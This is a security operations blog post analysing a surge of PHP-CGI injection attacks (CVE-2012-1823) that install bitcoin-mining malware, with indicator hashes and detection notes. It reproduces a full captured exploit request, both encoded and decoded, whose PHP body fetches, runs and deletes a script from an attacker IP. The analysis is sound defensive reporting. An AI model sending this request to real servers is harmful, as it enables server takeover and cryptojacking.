Video Screencast Help
Cyber Security Group

PHP Inclusion Activity

Created: 06 Jan 2014 • Updated: 07 Jan 2014
MSS Global Threat Response's picture
+3 3 Votes
Login to vote

Since the 14th of December, the SOC has noticed a substantial increase in the quantity of PHP code inclusion attacks against MSS customers. Specifically, attempts to compromise and infect internet facing webservers by injecting malicious PHP code have been observed. While the primary vulnerability being targeted (CVE-2012-1823) isn’t new, a significant uptick in attempts to exploit it is worthy of note. Proof of concept exploit code has been publically available for some time. At this time, it appears that only Linux webservers running out of date versions of PHP are vulnerable.

php-attack-blog-1.png

At the time of this post, more than sixty SOC customers have been affected by these exploit attempts. There is no clear correlation between this activity and any individual industry vertical, with customers in health, financial, telecommunications, local government, and more being affected.

The main driver behind these exploits is to compromise and infect the victim webserver for financial gain. Binaries were extracted from the malicious servers utilized in the attack, revealing primarily bitcoin mining malware. Bitcoins are a virtual currency which is generated based on mathematical operations known as ‘mining’ on computer hardware. Attackers often infect machines with the intent of using them to generate bitcoins for financial gain.

More than 1,000 sources have been observed participating in this exploit activity since the initial increase was noted. There’s no clear trend or geographic breakdown of source addresses that would lend itself to attribution. Due to the nature of the attack, return traffic to the source host is not required. Redirection information is contained in the original exploit attempt, leading us to believe that source IP information has been spoofed. Identical exploit strings have been observed from numerous source addresses, further indicating spoofed activity.

Analysis:

Below is an example of one of several observed packages surrounding these exploit attempts. Other samples encountered during our research perform similar actions.

Example inbound traffic

POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1

Host: [victim server IP]

User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26(KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25

Content-Type: application/x-www-form-urlencoded

Content-Length: 84

Connection: close

<?php system("wget http://74.208.228[.]113/a  -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh");

Translation

  1. A percent encoded hex POST request is passed to the victim server attempting to exploit the vulnerability, followed by PHP containing shell commands.
  • Decoded POST:

POST /cgi-bin/php.cgi?-d?allow_url_include=on?-d?safe_mode=off?-d?suhosin.simulation=on?-d?disable_functions=""?-d?open_basedir=none?-d?auto_prepend_file=php://input?-d?cgi.force_redirect=0?-d?cgi.redirect_status_env=0?-n

  1. The injected commands (if successfully executed by the victim server) will download, execute, and subsequently delete a malicious script designed to infect the victim.

At this point, the following files are downloaded and various steps are taken on the system. These steps include execution of additional malware (ELF executables), the addition of a cron job to ensure some form of persistence, and various process + file maintenance actions.

File Name            MD5                                                                                      Description

a                              d3754d4869164df4a6307d48d30752e6                    Shell script, initial activity

update                 7bb7dc624a19ed58fa9a0fdb30752098                     Shell script, update routine

sh                           83aa145f8b12365ca7ce37f0b03bf745                       Bitcoin miner/trojan

clamav                  8bcf90e5f865acd004a43f2ba891534b                      Bitcoin miner/trojan

VirusTotal Anti-Virus Detect Rate

sh                           83aa145f8b12365ca7ce37f0b03bf745                       6 / 49

clamav                  8bcf90e5f865acd004a43f2ba891534b                      11/49

php-attack-blog-2.png

A list of the files retrieved in this particular PHP exploit along with details and MD5 hashes.

php-attack-blog-3.png

The initial redirect contained inside the exploit leads to this script, which is downloaded and executed if the victim machine is vulnerable. This process sets up an “update” cron job (see below) as well as downloads and executes the core Bitcoin mining binaries. Notice the Stratum traffic to port 3333/TCP, which is a well-known Bitcoin protocol.

php-attack-blog-4.png

Contents of the “update” script. This process attempts to maintain persistence on the victim machine by re-running the initial “a” script if an existing malicious connection isn’t already open.

Impact and MSS detection:

At first glance, the intent of this exploit and infection activity isn’t to damage or steal information from victim webservers. The role of Bitcoin mining in this scenario is to harness the victim’s computational resources to financially benefit the perpetrators. The victim systems in this situation have been wrongfully hijacked and pressed into service, which may cause slowdowns for legitimate users and resource issues for server owners. Due to the persistent nature and continuous “phone home” tendencies of these infections, additional malicious action could be taken on infected machines in the future.

We believe the activity highlighted in this report is related to a worm detailed in the following Symantec write-up: http://www.symantec.com/connect/blogs/linux-worm-targeting-hidden-devices

Currently, MSS has coverage for this initial exploit activity via most IDS vendors, including Sourcefire, Cisco, Palo Alto, Emerging Threats, and more. Based on samples extracted and observed infections, additional post-compromise IP and URL based MSS signatures are in place across our entire customer base. At this stage, customers will be alerted to both exploit and compromise activity.